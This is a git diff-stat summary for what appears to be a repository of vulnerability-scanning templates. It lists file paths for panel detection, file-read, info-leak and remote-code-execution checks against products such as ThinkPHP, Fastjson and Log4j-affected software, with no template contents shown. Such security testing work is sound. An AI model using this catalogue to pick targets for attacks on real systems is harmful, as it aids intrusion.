0 poc/other/clientaccesspolicy.yaml | 54 +- poc/other/cloudinary.yaml | 12 +- poc/other/cloudphysician-radar.yaml | 20 +- poc/other/codeigniter-env.yaml | 6 +- poc/other/cofense-vision-panel-1141.yaml | 27 - poc/other/cofense-vision-panel-1142.yaml | 28 + poc/other/cofense-vision-panel.yaml | 15 +- poc/other/cold-fusion-cfcache-map.yaml | 56 +- poc/other/concourse-ci-panel.yaml | 12 +- poc/other/contacam-1197.yaml | 19 +- poc/other/contacam-1198.yaml | 22 +- poc/other/contact-form-7.yaml | 48 - poc/other/content-scheme.yaml | 15 +- poc/other/crossdomain-xml-1267.yaml | 29 + poc/other/csod-panel-1286.yaml | 20 + poc/other/cucm-username-enumeration.yaml | 8 +- poc/other/custom_nuclei-2.yaml | 10 +- poc/other/custom_nuclei-3.yaml | 44 + poc/other/d-link-arbitary-fileread-7043.yaml | 27 + poc/other/d-link-arbitary-fileread-7044.yaml | 21 - poc/other/d-link-wireless-7047.yaml | 23 - poc/other/d-link-wireless-7048.yaml | 6 +- poc/other/dead-host-with-cname-6786.yaml | 23 - poc/other/deimos-c2.yaml | 33 + poc/other/deprecated-tls-6958.yaml | 19 +- poc/other/deprecated-tls.yaml | 27 +- poc/other/development-logs-6989.yaml | 40 - ...fileread(1).yaml => diaowen-fileread.yaml} | 0 poc/other/dir-listing-7003.yaml | 19 + poc/other/dir-listing-7005.yaml | 8 +- poc/other/dlink-850l-info-leak-7035.yaml | 37 + poc/other/dlink-850l-info-leak-7037.yaml | 6 +- poc/other/dlink-850l-info-leak-7039.yaml | 29 + poc/other/dlink-file-read.yaml | 40 +- poc/other/dokuwiki-panel.yaml | 28 - poc/other/domcfg-page-7076.yaml | 8 +- poc/other/domcfg-page.yaml | 12 +- poc/other/drone-ci-panel-7091.yaml | 27 + poc/other/drone-ci-panel.yaml | 19 +- poc/other/dropbox.yaml | 13 +- poc/other/druid-monitor-7100.yaml | 2 +- poc/other/druid-monitor-7102.yaml | 22 + poc/other/druid-monitor-7103.yaml | 18 - poc/other/druid-monitor.yaml | 10 +- poc/other/ds-store-file.yaml | 36 + poc/other/dss-download-fileread-7117.yaml | 16 +- poc/other/dss-download-fileread.yaml | 20 + poc/other/dxplanning-panel.yaml | 37 - ...l => dynamic-broadcast-receiver-7141.yaml} | 0 poc/other/dynamic-broadcast-receiver.yaml | 38 +- .../easy-media-gallery-pro-listing-7152.yaml | 22 + .../easy-media-gallery-pro-listing-7153.yaml | 49 +- poc/other/ecology-getshell.yaml | 6 +- poc/other/emerson-power-panel.yaml | 14 +- poc/other/entrust-identityguard.yaml | 23 +- poc/other/{Bitrix_check_env.yaml => env.yaml} | 0 poc/other/envision-gateway-7227.yaml | 10 +- poc/other/envision-gateway.yaml | 22 - poc/other/error-logs-7254.yaml | 48 +- poc/other/error-logs-7255.yaml | 61 + poc/other/example-template.yaml | 8 +- poc/other/f-secure-policy-manager-7560.yaml | 23 + poc/other/f-secure-policy-manager-7564.yaml | 7 +- ...436.yaml => fatpipe-ipvpn-panel-7435.yaml} | 0 poc/other/fatpipe-ipvpn-panel.yaml | 20 +- ...scheme-7468.yaml => file-scheme-7467.yaml} | 0 poc/other/filezilla-7470.yaml | 35 + poc/other/filezilla-7471.yaml | 1 + poc/other/fiorilaunchpad-logon.yaml | 16 +- poc/other/firebase-urls-7497.yaml | 8 +- poc/other/firebase-urls-7499.yaml | 10 +- poc/other/flightpath-panel.yaml | 12 +- poc/other/formula.yaml | 59 + poc/other/fortimail-panel-7532.yaml | 6 +- poc/other/fortimail-panel.yaml | 18 +- poc/other/fortinet-fortigate-panel-7536.yaml | 20 - .../foulenzer-subdomain-tk (copy 1).yaml | 183 - poc/other/foulenzer-subdomain-tk.yaml | 210 +- poc/other/gespage-panel-7605.yaml | 34 - poc/other/gespage-panel-7606.yaml | 34 + poc/other/gespage-panel.yaml | 12 +- poc/other/globalprotect-panel-7720.yaml | 21 - poc/other/glpi-directory-listing-7734.yaml | 34 - poc/other/glpi-directory-listing.yaml | 30 + poc/other/glpidirectorylisting(1).yaml | 47 - poc/other/glpidirectorylisting.yaml | 103 +- poc/other/go-anywhere-client.yaml | 19 +- poc/other/gogs-workflow-7760.yaml | 11 + poc/other/gogs-workflow.yaml | 11 - poc/other/goodjob-dashboard.yaml | 35 + poc/other/gradle-enterprise-panel-7800.yaml | 14 +- poc/other/gradle-enterprise-panel.yaml | 28 +- poc/other/grafana-file-read-7810.yaml | 17 +- poc/other/grafana-file-read-7812.yaml | 6 - poc/other/h2console-panel-7866.yaml | 24 - poc/other/h2console-panel.yaml | 18 +- poc/other/hack5-cloud-c2.yaml | 32 - poc/other/haivision-gateway-panel.yaml | 27 + poc/other/hanming-lfr-7879.yaml | 7 +- poc/other/hanming-lfr.yaml | 33 - poc/other/haproxy-status-7883.yaml | 19 +- ...orkflow-7889.yaml => harbor-workflow.yaml} | 0 poc/other/heatmiser-wifi-thermostat-7923.yaml | 20 +- poc/other/heatmiser-wifi-thermostat.yaml | 21 - poc/other/hikvision-info-leak-7958.yaml | 34 - poc/other/hikvision-info-leak.yaml | 21 + poc/other/hitron-technologies-7961.yaml | 25 + poc/other/hitron-technologies-7962.yaml | 24 - poc/other/hitron-technologies.yaml | 18 +- .../hjtcloud-arbitrary-file-read-7967.yaml | 37 - poc/other/hjtcloud-arbitrary-file-read.yaml | 9 +- ...jtcloud-rest-arbitrary-file-read-7975.yaml | 9 +- ...=> hjtcloud-rest-arbitrary-file-read.yaml} | 0 poc/other/hmc-hybris-panel-7977.yaml | 19 - poc/other/hmc-hybris-panel-7978.yaml | 19 + poc/other/hmc-hybris-panel.yaml | 13 +- .../honeywell-building-control-7987.yaml | 24 + .../honeywell-building-control-7988.yaml | 24 - ...{hp-ilo-5-8021.yaml => hp-ilo-5-8018.yaml} | 0 poc/other/hp-ilo-5-8020.yaml | 33 + poc/other/hp-service-manager-8032.yaml | 20 - poc/other/hp-service-manager-8034.yaml | 24 + poc/other/hp-service-manager.yaml | 6 +- .../hpe-system-management-anonymous-8013.yaml | 21 - poc/other/huawei-hg532e-panel-8065.yaml | 4 +- poc/other/huawei-hg532e-panel-8066.yaml | 30 - poc/other/huawei-hg532e-panel.yaml | 21 +- poc/other/hubspot.yaml | 29 +- poc/other/huijietong-cloud-fileread-8085.yaml | 23 +- poc/other/huijietong-cloud-fileread.yaml | 31 + poc/other/identity-services-engine-8146.yaml | 21 - ...dentityguard-selfservice-entrust-8142.yaml | 21 - poc/other/immich-panel.yaml | 37 - poc/other/interactsh-server-8165.yaml | 35 - poc/other/interactsh-server.yaml | 20 + poc/other/interlib-fileread-8171.yaml | 8 +- poc/other/interlib-fileread-8173.yaml | 2 +- poc/other/internet-service-8178.yaml | 20 + poc/other/internet-service.yaml | 22 - poc/other/iomega-emc-shared-nas.yaml | 18 +- poc/other/ioncube-loader-wizard-8185.yaml | 10 +- ...d-8184.yaml => ioncube-loader-wizard.yaml} | 0 poc/other/ipstack.yaml | 12 +- poc/other/iptime-router.yaml | 21 +- ...p-panel-8204.yaml => itop-panel-8205.yaml} | 0 poc/other/itop-panel.yaml | 16 +- poc/other/ixcache-panel.yaml | 22 +- poc/other/jaeger-ui-dashboard.yaml | 9 +- poc/other/jamf-panel-8215.yaml | 6 +- poc/other/jamf-panel-8216.yaml | 28 - poc/other/jamf-panel.yaml | 21 +- poc/other/jfrog-8306.yaml | 20 - poc/other/jfrog.yaml | 19 +- poc/other/jkstatus-manager-8344.yaml | 18 - poc/other/jkstatus-manager-8347.yaml | 30 +- poc/other/jmx-console-8351.yaml | 16 + poc/other/jmx-console-8352.yaml | 15 - .../{jolokia-8367.yaml => jolokia-8369.yaml} | 0 poc/other/jolokia-list-8360.yaml | 28 - poc/other/jolokia-list-8361.yaml | 27 + poc/other/jolokia-list.yaml | 12 +- poc/other/jumpcloud.yaml | 11 +- poc/other/kerio-connect-client-8452.yaml | 2 +- poc/other/kerio-connect-client.yaml | 18 +- poc/other/kingsoft-v8-file-read-8491.yaml | 6 +- poc/other/kingsoft-v8-file-read.yaml | 34 + poc/other/kubelet-healthz-8518.yaml | 1 - poc/other/kubelet-healthz.yaml | 34 + poc/other/kubelet-pods-8522.yaml | 1 - poc/other/kubelet-pods-8523.yaml | 22 + ...570.yaml => landray-oa-fileread-8571.yaml} | 0 poc/other/leostream-panel-8610.yaml | 16 +- poc/other/leostream-panel.yaml | 19 +- poc/other/liveview-axis-camera-8648.yaml | 51 + poc/other/lockself-panel.yaml | 28 - poc/other/lokalise.yaml | 28 +- poc/other/lotus-domino-version-8656.yaml | 6 +- poc/other/lotus-domino-version-8657.yaml | 34 - poc/other/lotus-domino-version.yaml | 30 + ...-8669.yaml => lucee-stack-trace-8668.yaml} | 0 poc/other/mailgun.yaml | 26 +- poc/other/manageengine-adaudit-8730.yaml | 34 + poc/other/manageengine-adaudit.yaml | 32 +- .../manageengine-adselfservice-8736.yaml | 4 +- .../manageengine-adselfservice-8738.yaml | 7 +- .../manageengine-apex-helpdesk-8746.yaml | 24 - .../manageengine-apex-helpdesk-8748.yaml | 19 + poc/other/manageengine-apex-helpdesk.yaml | 19 +- ...anageengine-applications-manager-8751.yaml | 24 - ...anageengine-applications-manager-8753.yaml | 19 + .../manageengine-applications-manager.yaml | 18 +- .../manageengine-assetexplorer-8757.yaml | 3 +- .../manageengine-assetexplorer-8758.yaml | 19 - poc/other/manageengine-assetexplorer.yaml | 20 +- poc/other/manageengine-desktop-8761.yaml | 4 +- poc/other/manageengine-desktop-8763.yaml | 19 - poc/other/manageengine-desktop.yaml | 19 +- poc/other/manageengine-opmanager-8767.yaml | 26 + poc/other/manageengine-opmanager-8768.yaml | 19 - ...aml => manageengine-servicedesk-8771.yaml} | 0 .../manageengine-supportcenter-8776.yaml | 4 +- .../manageengine-supportcenter-8777.yaml | 19 - poc/other/{get.yaml => match-1.yaml} | 0 ...her-with-or.yaml => matcher-with-and.yaml} | 0 poc/other/meduza-stealer.yaml | 32 - poc/other/memcached-stats.yaml | 15 +- poc/other/metadata-alibaba-8807.yaml | 39 + poc/other/metadata-alibaba-8809.yaml | 14 +- poc/other/metadata-azure-8813.yaml | 42 - poc/other/metadata-azure.yaml | 42 + poc/other/metadata-hetzner-8822.yaml | 42 + poc/other/metadata-hetzner.yaml | 10 +- poc/other/metadata-openstack-8827.yaml | 21 +- poc/other/metadata-openstack-8828.yaml | 10 +- poc/other/metadata-service-alibaba.yaml | 60 +- poc/other/mikrotik-graph-8870.yaml | 20 - poc/other/mikrotik-graph-8871.yaml | 20 + poc/other/mikrotik-routeros.yaml | 52 +- poc/other/mini-start-page-8895.yaml | 21 + poc/other/mini-start-page-8896.yaml | 22 - poc/other/mini-start-page.yaml | 19 +- poc/other/mobileiron-sentry.yaml | 32 + poc/other/mobotix-guest-camera-8910.yaml | 20 - poc/other/mobotix-guest-camera-8911.yaml | 19 +- poc/other/moodle-changelog.yaml | 17 +- poc/other/moodle-workplace-panel.yaml | 28 + poc/other/mx-fingerprint-8973.yaml | 22 +- poc/other/mx-fingerprint.yaml | 22 + poc/other/mystic-stealer.yaml | 27 + poc/other/nameserver-fingerprint-8998.yaml | 19 +- poc/other/nameserver-fingerprint.yaml | 22 + poc/other/navicat-server-panel.yaml | 39 - poc/other/neos-panel-9015.yaml | 3 +- poc/other/neos-panel.yaml | 22 +- ...panel-9020.yaml => nessus-panel-9017.yaml} | 0 poc/other/nessus-panel-9019.yaml | 7 +- poc/other/netflix-conductor-ui.yaml | 27 +- poc/other/netflix-conductor-version.yaml | 37 +- poc/other/netis-info-leak-9036.yaml | 8 +- poc/other/netis-info-leak.yaml | 30 + poc/other/netrc-9045.yaml | 19 +- poc/other/netscaler-gateway-9052.yaml | 23 - poc/other/netscaler-gateway.yaml | 15 +- poc/other/nextcloud-install-9084.yaml | 25 + poc/other/nextcloud-install-9085.yaml | 28 - poc/other/nexus-panel.yaml | 35 + poc/other/nh-c2.yaml | 28 - poc/other/ns-asg-file-read-9153.yaml | 24 - poc/other/ns-asg-file-read.yaml | 36 - poc/other/ntlm-directories-9155.yaml | 118 +- poc/other/ntlm-directories-9156.yaml | 119 +- poc/other/nuuo-file-inclusion-9169.yaml | 20 +- poc/other/officedocuments.yaml | 11 +- poc/other/oki-data-9223.yaml | 19 + poc/other/oki-data-9226.yaml | 20 - poc/other/oki-data.yaml | 19 +- poc/other/okiko-sfiler-portal-9227.yaml | 32 + ...a-panel-9231.yaml => okta-panel-9234.yaml} | 0 poc/other/old-copyright-9237.yaml | 45 - poc/other/old-copyright-9238.yaml | 3 +- poc/other/one_line_checks_nuclei.yaml | 16 +- poc/other/onliner-multiple-bugs.yaml | 62 +- .../oob-param-based-interaction-9252.yaml | 26 + poc/other/oob-param-based-interaction.yaml | 19 - poc/other/open-mjpg-streamer-9282.yaml | 11 +- poc/other/open-mjpg-streamer-9284.yaml | 26 - poc/other/open-proxy-internal-9289.yaml | 111 - poc/other/open-proxy-internal-9290.yaml | 134 + poc/other/open-proxy-portscan-9295.yaml | 62 + poc/other/open-proxy-portscan-9296.yaml | 6 +- poc/other/open-proxy-portscan.yaml | 13 +- ...pen-virtualization-manager-panel-9328.yaml | 33 + .../open-virtualization-manager-panel.yaml | 16 +- poc/other/openam-workflow.yaml | 11 + poc/other/opensis-workflow-9318.yaml | 11 + ...rkflow-9319.yaml => opensis-workflow.yaml} | 0 .../opentouch-multimediaservices-panel.yaml | 46 - poc/other/overseerr-panel.yaml | 34 + .../pacs-connexion-utilisateur-9425.yaml | 24 - poc/other/pacs-connexion-utilisateur.yaml | 20 +- poc/other/pagerduty.yaml | 16 +- poc/other/pagespeed-global-admin-9433.yaml | 29 + poc/other/pagespeed-global-admin-9435.yaml | 33 - poc/other/pagespeed-global-admin.yaml | 8 +- poc/other/pahtool-panel.yaml | 35 - poc/other/panabit-panel-9444.yaml | 24 + poc/other/panabit-panel-9445.yaml | 25 - .../panasonic-network-management-9447.yaml | 20 - .../panasonic-network-management-9448.yaml | 21 + .../panasonic-network-management-9449.yaml | 5 +- poc/other/parallels-html-client-9464.yaml | 16 +- poc/other/passbolt-panel.yaml | 35 + poc/other/pdi-device-page.yaml | 31 + poc/other/pendo.yaml | 17 +- ...anel-9483.yaml => pentaho-panel-9481.yaml} | 0 poc/other/pivotaltracker.yaml | 15 +- poc/other/plausible-panel.yaml | 35 + poc/other/plesk-obsidian-9594.yaml | 24 - poc/other/plesk-obsidian-9597.yaml | 3 +- ...sk-onyx-9598.yaml => plesk-onyx-9601.yaml} | 0 poc/other/plesk-onyx.yaml | 6 +- poc/other/plesk-stat-9604.yaml | 43 - poc/other/plesk-stat.yaml | 28 + poc/other/plugin.yaml | 49 + poc/other/portainer-init-deploy-9633.yaml | 24 +- ...y-9630.yaml => portainer-init-deploy.yaml} | 0 poc/other/posteio-admin-panel.yaml | 31 - .../postmessage-outgoing-tracker-9634.yaml | 66 - poc/other/postmessage-outgoing-tracker.yaml | 63 + poc/other/postmessage-tracker-9637.yaml | 57 +- poc/other/postmessage-tracker-9639.yaml | 47 +- poc/other/powerlogic-ion-9648.yaml | 19 - poc/other/powerlogic-ion-9650.yaml | 20 + poc/other/powerlogic-ion.yaml | 24 +- poc/other/printers-info-leak.yaml | 15 +- ...678.yaml => prometheus-exporter-9677.yaml} | 0 poc/other/prometheus-exporter.yaml | 26 + poc/other/prometheus-flags-9687.yaml | 42 + poc/other/prometheus-flags.yaml | 31 - poc/other/prometheus-targets-9691.yaml | 38 - poc/other/prototype-pollution-check-9698.yaml | 95 + poc/other/prototype-pollution-check-9699.yaml | 95 - poc/other/prototype-pollution-check.yaml | 134 +- ...path-9702.yaml => provider-path-9701.yaml} | 0 poc/other/ptr-fingerprint-9707.yaml | 19 +- poc/other/ptr-fingerprint.yaml | 22 + poc/other/pulse-secure-panel-9712.yaml | 19 + poc/other/pulse-secure-panel-9715.yaml | 27 +- ...-enb.yaml => put-method-enabled-9727.yaml} | 0 poc/other/put-method-enabled.yaml | 25 - poc/other/pypicloud-panel-9733.yaml | 24 + poc/other/pypicloud-panel.yaml | 19 +- poc/other/qdpm-info-leak-9753.yaml | 27 + poc/other/qdpm-info-leak.yaml | 31 + poc/other/qualcomm-voip-router.yaml | 18 +- .../{race-multiple.yaml => race-simple.yaml} | 0 poc/other/radius-manager-9794.yaml | 22 + poc/other/radius-manager-9796.yaml | 22 - poc/other/rancher-panel.yaml | 31 +- .../{get-override-sni.yaml => raw-get.yaml} | 0 poc/other/red-lion-panel.yaml | 26 + poc/other/request-based-interaction-9862.yaml | 56 + ...63.yaml => request-based-interaction.yaml} | 0 poc/other/resin-inputfile-fileread-9868.yaml | 21 - poc/other/resin-inputfile-fileread-9870.yaml | 22 + poc/other/resin-inputfile-fileread-9871.yaml | 1 - poc/other/resin-viewfile-lfr.yaml | 27 + poc/other/robots-txt-9888.yaml | 28 + poc/other/robots-txt-9890.yaml | 23 - poc/other/rsa-self-service.yaml | 19 +- poc/other/ruijie-EG-fileDown.yaml | 2 - poc/other/ruijie-eg-filedown.yaml | 24 + ...8.yaml => scs-landfill-control-10097.yaml} | 0 poc/other/securenvoy-panel-10114.yaml | 19 - poc/other/securenvoy-panel-10116.yaml | 19 + poc/other/securepoint-utm-10117.yaml | 27 - poc/other/securepoint-utm-10118.yaml | 32 + poc/other/security-10123.yaml | 25 - poc/other/security-10124.yaml | 23 + poc/other/security-txt.yaml | 2 + poc/other/selea-ip-camera-10136.yaml | 30 - poc/other/selfcheck-panel.yaml | 33 + poc/other/sendgrid.yaml | 6 +- poc/other/server-status-localhost-10163.yaml | 14 +- poc/other/server-status-localhost-10165.yaml | 28 - poc/other/server-status-localhost-10166.yaml | 22 + poc/other/servfail-refused-hosts-10167.yaml | 9 +- poc/other/servfail-refused-hosts-10170.yaml | 16 +- poc/other/shell-history-10192.yaml | 28 +- ...-history-10193.yaml => shell-history.yaml} | 0 poc/other/shellscripts.yaml | 28 +- poc/other/short-io.yaml | 15 +- poc/other/sidekiq-dashboard-10235.yaml | 19 - poc/other/sidekiq-dashboard-10239.yaml | 22 + poc/other/signatures-10248.yaml | 52090 ++++++++++- poc/other/signatures-10268.yaml | 2170 + poc/other/signatures.yaml | 75682 +++++++++++++++- poc/other/sitemap.yaml | 40 - ...4.yaml => skycaiji-admin-panel-10306.yaml} | 0 poc/other/slack.yaml | 10 +- poc/other/softether-vpn-panel.yaml | 30 - poc/other/solarwinds-orion-10357.yaml | 17 + poc/other/solarwinds-orion-10359.yaml | 15 - poc/other/solarwinds-orion.yaml | 16 +- poc/other/solr-fileRead.yaml | 5 +- poc/other/solr-fileread.yaml | 33 + poc/other/solr-query-dashboard-10368.yaml | 25 + poc/other/solr-query-dashboard.yaml | 20 - ...l => sonarqube-public-projects-10377.yaml} | 0 poc/other/sonicwall-management-panel.yaml | 16 +- ...yaml => sonicwall-sslvpn-panel-10388.yaml} | 0 poc/other/sonicwall-sslvpn-panel.yaml | 24 +- .../sonicwall-sslvpn-shellshock-10394.yaml | 20 +- .../sonicwall-sslvpn-shellshock-10395.yaml | 27 + poc/other/sphinxonline-panel.yaml | 43 + ...spidercontrol-scada-server-info-10411.yaml | 9 +- ...spidercontrol-scada-server-info-10413.yaml | 38 - poc/other/splunk-enterprise-panel-10415.yaml | 31 - .../spoofable-spf-records-ptr-10424.yaml | 19 + .../spoofable-spf-records-ptr-10425.yaml | 16 - poc/other/square.yaml | 16 +- ...squid-analysis-report-generator-10513.yaml | 5 +- poc/other/sugarcrm-panel.yaml | 8 +- poc/other/supershell-c2.yaml | 34 - poc/other/supervpn-panel-10577.yaml | 27 - .../symantec-messaging-gateway-10607.yaml | 7 +- .../symantec-messaging-gateway-10610.yaml | 19 - .../symantec-pgp-global-directory-10611.yaml | 21 + poc/other/symantec-pgp-global-directory.yaml | 19 +- poc/other/symfony-profiler-10628.yaml | 4 +- poc/other/symfony-profiler.yaml | 29 +- poc/other/synopsys-coverity-panel.yaml | 36 - poc/other/tableau-panel.yaml | 18 +- poc/other/tabnabbing-check-10646.yaml | 22 + .../teamcity-registration-enabled-10667.yaml | 34 - poc/other/teamcity-registration-enabled.yaml | 30 + poc/other/teamforge-panel.yaml | 43 + poc/other/tectuus-scada-monitor.yaml | 16 +- poc/other/tekon-info-leak-10684.yaml | 8 +- poc/other/tekon-info-leak-10685.yaml | 40 + poc/other/teradici-pcoip-10703.yaml | 7 + poc/other/teradici-pcoip.yaml | 26 - .../terraform-enterprise-panel-10710.yaml | 27 - .../terraform-enterprise-panel-10711.yaml | 27 + poc/other/terraform-enterprise-panel.yaml | 19 +- poc/other/thinfinity-virtualui-panel.yaml | 18 +- poc/other/thinkCMF_include.yaml | 2 + ...inkcmf-arbitrary-code-execution-10715.yaml | 29 - .../thinkcmf-arbitrary-code-execution.yaml | 23 + poc/other/thinkcmf_include.yaml | 22 - poc/other/tianqing-info-leak.yaml | 11 +- poc/other/tibco-spotfire-panel.yaml | 35 + poc/other/tigase-xmpp-server.yaml | 31 + poc/other/tileserver-gl-10786.yaml | 21 +- poc/other/tileserver-gl.yaml | 33 + poc/other/tor-socks-proxy-10811.yaml | 29 - poc/other/traefik-dashboard-10832.yaml | 15 - poc/other/traefik-dashboard-10834.yaml | 15 + poc/other/travisci.yaml | 6 +- .../tuxedo-connected-controller-10852.yaml | 20 + .../tuxedo-connected-controller-10855.yaml | 21 - poc/other/tuxedo-connected-controller.yaml | 5 +- poc/other/upnp-device-10981.yaml | 3 +- poc/other/upnp-device-10982.yaml | 39 - poc/other/ups-status-10983.yaml | 20 - poc/other/ups-status-10985.yaml | 21 + poc/other/url.yaml | 41 +- poc/other/veriz0wn-osint.yaml | 29 - ...5.yaml => voipmonitor-workflow-11064.yaml} | 0 poc/other/voipmonitor-workflow.yaml | 11 - poc/other/wago-plc-panel-11091.yaml | 2 +- .../wallix-accessmanager-panel-11094.yaml | 29 - .../wallix-accessmanager-panel-11095.yaml | 30 + poc/other/wallix-accessmanager-panel.yaml | 22 +- poc/other/wazuh-panel-11113.yaml | 33 - poc/other/wazuh-panel-11114.yaml | 34 + poc/other/wazuh-panel.yaml | 10 +- poc/other/weatherlink-11117.yaml | 3 +- poc/other/weatherlink.yaml | 22 +- ...-leakage(1).yaml => wireless-leakage.yaml} | 0 poc/other/woosidebars.yaml | 5 +- poc/other/wooyun-2015-148227(1).yaml | 26 + poc/other/wooyun-2015-148227-11224.yaml | 23 +- poc/other/wooyun-2015-148227-11225.yaml | 2 +- poc/other/wooyun-2015-148227-11228.yaml | 1 + poc/other/workspace-one-uem-11393.yaml | 17 - poc/other/workspace-one-uem-11394.yaml | 16 + poc/other/workspace-one-uem.yaml | 5 +- poc/other/wowza-streaming-engine-11399.yaml | 22 - poc/other/wowza-streaming-engine.yaml | 12 +- poc/other/wso2-2019-0598-11635.yaml | 36 - poc/other/wso2-management-console-11644.yaml | 19 - poc/other/wso2-management-console-11645.yaml | 17 +- poc/other/wso2-management-console-11647.yaml | 30 + poc/other/wso2-management-console.yaml | 36 +- ...mtconsole(1).yaml => wso2mgmtconsole.yaml} | 0 poc/other/xds-amr-status-11669.yaml | 5 + poc/other/xff-403-bypass.yaml | 24 +- poc/other/xprober-service-11694.yaml | 3 +- poc/other/xxljob-panel.yaml | 18 +- poc/other/yarn-lock-11730.yaml | 5 + poc/other/yarn-lock.yaml | 25 + poc/other/yongyou-ELTextFile.yaml | 2 - poc/other/yongyou-eltextfile.yaml | 23 + poc/other/yopass-panel-11749.yaml | 16 - poc/other/yopass-panel-11750.yaml | 16 + poc/other/yopass-panel.yaml | 15 +- poc/other/zhiyuan-oa-info-leak-11797.yaml | 5 +- poc/other/zhiyuan-oa-info-leak-11799.yaml | 23 + poc/other/zhiyuan-oa-info-leak-11800.yaml | 23 - poc/other/zhongkewangwei-fileread.yaml | 20 + poc/other/zte-panel-11840.yaml | 19 +- poc/other/zuul-panel-11843.yaml | 33 + poc/other/zuul-panel.yaml | 22 +- poc/perl/perl-status-9486.yaml | 17 +- poc/perl/perl-status-9487.yaml | 16 + poc/php/clockwork-php-page-1016.yaml | 31 + poc/php/clockwork-php-page-1019.yaml | 15 +- ...s-9497.yaml => php-backup-files-9498.yaml} | 0 poc/php/php-backup-files.yaml | 127 +- poc/php/php-errors-9511.yaml | 40 - poc/php/php-errors.yaml | 41 - poc/php/php-proxy-detect-9544.yaml | 8 +- poc/php/php-proxy-detect.yaml | 26 - poc/php/php-scanner-9546.yaml | 59 +- poc/php/php-scanner.yaml | 258 + poc/php/php-timeclock-xss-9552.yaml | 19 +- poc/php/php-timeclock-xss-9553.yaml | 45 +- poc/php/php-user-ini-disclosure-9561.yaml | 7 +- ...ml => php-zerodium-backdoor-rce-9572.yaml} | 0 poc/php/php-zerodium-backdoor-rce.yaml | 29 - poc/php/phpcollab-detect-9499.yaml | 21 + poc/php/phpcollab-workflow-9502.yaml | 11 + poc/php/phpcollab-workflow-9503.yaml | 11 - poc/php/phpcollab-workflow.yaml | 2 +- poc/php/phpinfo-9520.yaml | 49 - poc/php/phpldapadmin-panel.yaml | 41 + poc/php/phpmyadmin-panel-9526.yaml | 18 +- poc/php/phpmyadmin-setup-9531.yaml | 36 - poc/php/phpmyadmin-setup-9532.yaml | 30 + poc/php/phpmyadmin-setup-9533.yaml | 14 +- poc/php/phpmyadmin-sql-9534.yaml | 28 - poc/php/phpmyadmin-sql.php-server.yaml | 5 - poc/php/phpunit-9556.yaml | 34 + poc/php/phpunit.yaml | 28 - poc/php/phpwiki-lfi-9567.yaml | 3 +- poc/php/ruijie-phpinfo-9952.yaml | 5 +- poc/php/ruijie-phpinfo-9953.yaml | 3 +- poc/php/thinkphp-2-rce-10740.yaml | 27 - poc/php/thinkphp-501-rce-10743.yaml | 39 - poc/php/thinkphp-501-rce.yaml | 24 + poc/php/thinkphp-5022-rce-10744.yaml | 27 + poc/php/thinkphp-5022-rce-10746.yaml | 10 +- ...-rce.yaml => thinkphp-5022-rce-10747.yaml} | 0 poc/php/thinkphp-5023-rce-10748.yaml | 25 - poc/php/thinkphp-5023-rce-10751.yaml | 12 +- ...kphp-509-information-disclosure-10755.yaml | 29 - .../thinkphp-509-information-disclosure.yaml | 14 +- poc/php/twig-php-ssti-10856.yaml | 15 + poc/php/twig-php-ssti-10859.yaml | 1 - poc/php/weiphp-sql-injection-11190.yaml | 11 +- poc/php/wp-phpfreechat-xss-11524.yaml | 24 - poc/php/wp-phpfreechat-xss-11527.yaml | 8 +- poc/php/wp-phpfreechat-xss-11528.yaml | 2 +- poc/python/Django-DebugMode.yaml | 8 +- poc/python/autobahn-python-detect-594.yaml | 30 + poc/python/autobahn-python-detect-595.yaml | 29 - poc/python/default-django-page-6840.yaml | 5 +- poc/python/default-django-page-6841.yaml | 10 +- poc/python/django-admin-panel-7023.yaml | 18 + poc/python/django-admin-panel.yaml | 16 +- poc/python/django-debug-detect.yaml | 12 +- poc/python/django-debug-exposed-404.yaml | 24 + poc/python/django-debug-exposure.yaml | 23 +- .../django-framework-exceptions-7033.yaml | 7 +- poc/python/django-framework-exceptions.yaml | 30 - poc/python/django-secret-key.yaml | 31 - poc/python/django-secret.key.yaml | 62 + poc/python/jupyter-ipython-unauth-8402.yaml | 21 - poc/python/jupyter-ipython-unauth-8405.yaml | 15 +- poc/python/python-metrics-9747.yaml | 10 +- poc/python/python-metrics.yaml | 25 - poc/python/python-scanner-9748.yaml | 57 + poc/python/python-scanner.yaml | 39 - poc/rabbitmq/rabbitmq-dashboard-9776.yaml | 14 - poc/rabbitmq/rabbitmq-dashboard-9779.yaml | 15 + poc/rabbitmq/rabbitmq-default-admin-9780.yaml | 25 + poc/rabbitmq/rabbitmq-default-admin-9782.yaml | 25 - poc/rabbitmq/rabbitmq-default-admin.yaml | 2 - poc/rabbitmq/rabbitmq-default-login-9783.yaml | 12 +- poc/rabbitmq/rabbitmq-default-login-9786.yaml | 12 +- poc/redis/exposed-redis-7339.yaml | 27 + poc/redis/exposed-redis.yaml | 24 +- .../Panabit-sy_addmount-rce.yaml | 2 + .../apache-flink-unauth-rce-355.yaml | 50 - .../apache-httpd-rce-362.yaml | 41 - .../apache-httpd-rce.yaml | 13 +- .../apache-solr-log4j-rce-372.yaml | 36 + .../apache-solr-log4j-rce.yaml | 63 +- .../cisco-cloudcenter-suite-log4j-rce.yaml | 63 - .../cisco-cloudcenter-suite-rce.yaml | 73 + .../code42-log4j-rce-1132.yaml | 36 +- ...4j-rce-1131.yaml => code42-log4j-rce.yaml} | 0 ...ml => core-chuangtian-cloud-rce-1211.yaml} | 0 .../custom-datadump-source-code-detect.yaml | 3 +- .../elex-woocommerce-xss-7199.yaml | 47 - .../elex-woocommerce-xss.yaml | 35 + .../eyou-email-rce-7380.yaml | 29 + .../eyou-email-rce-7382.yaml | 28 + poc/remote_code_execution/eyou-email-rce.yaml | 4 - .../fastjson-1-2-24-rce-7400.yaml | 21 +- .../fastjson-1-2-24-rce.yaml | 46 - .../fastjson-1-2-41-rce-7403.yaml | 17 +- .../fastjson-1-2-41-rce.yaml | 31 + .../fastjson-1-2-42-rce-7407.yaml | 17 +- ...rce.yaml => fastjson-1-2-42-rce-7408.yaml} | 0 .../fastjson-1-2-43-rce-7411.yaml | 17 +- .../fastjson-1-2-43-rce-7412.yaml | 44 + .../fastjson-1-2-47-rce-7415.yaml | 19 +- .../fastjson-1-2-47-rce-7416.yaml | 9 +- .../fastjson-1-2-62-rce-7419.yaml | 43 + .../fastjson-1-2-67-rce-7424.yaml | 17 +- poc/remote_code_execution/forcepoint.yaml | 14 +- .../gitlab-rce-7692.yaml | 21 +- .../gitlab-rce-7693.yaml | 17 +- .../h3c-imc-rce-7868.yaml | 18 +- .../hashicorp-consul-rce-7890.yaml | 25 +- 